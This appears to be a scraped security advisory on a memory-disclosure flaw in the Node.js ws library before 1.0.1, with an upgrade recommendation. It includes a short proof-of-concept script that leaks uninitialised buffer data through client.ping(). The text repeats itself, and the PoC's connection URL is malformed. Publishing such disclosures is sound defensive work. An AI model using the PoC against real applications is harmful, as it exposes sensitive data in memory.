Versions of ws
prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping()
call will cause ws
to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
Proof of Concept
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws:https://localhost:9000')
client.on('open', function () {
console.log('open')
client.ping(50) // this sends a non-zeroed buffer of 50 bytes
client.on('pong', function (data) {
console.log('got pong')
console.log(data) // Data from the client.
})
})
Recommendation
Update to version 1.0.1 or greater.
References
Versions of
ws
prior to 1.0.1 are affected by a remote memory disclosure vulnerability.In certain rare circumstances, applications which allow users to control the arguments of a
client.ping()
call will causews
to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.Proof of Concept
Recommendation
Update to version 1.0.1 or greater.
References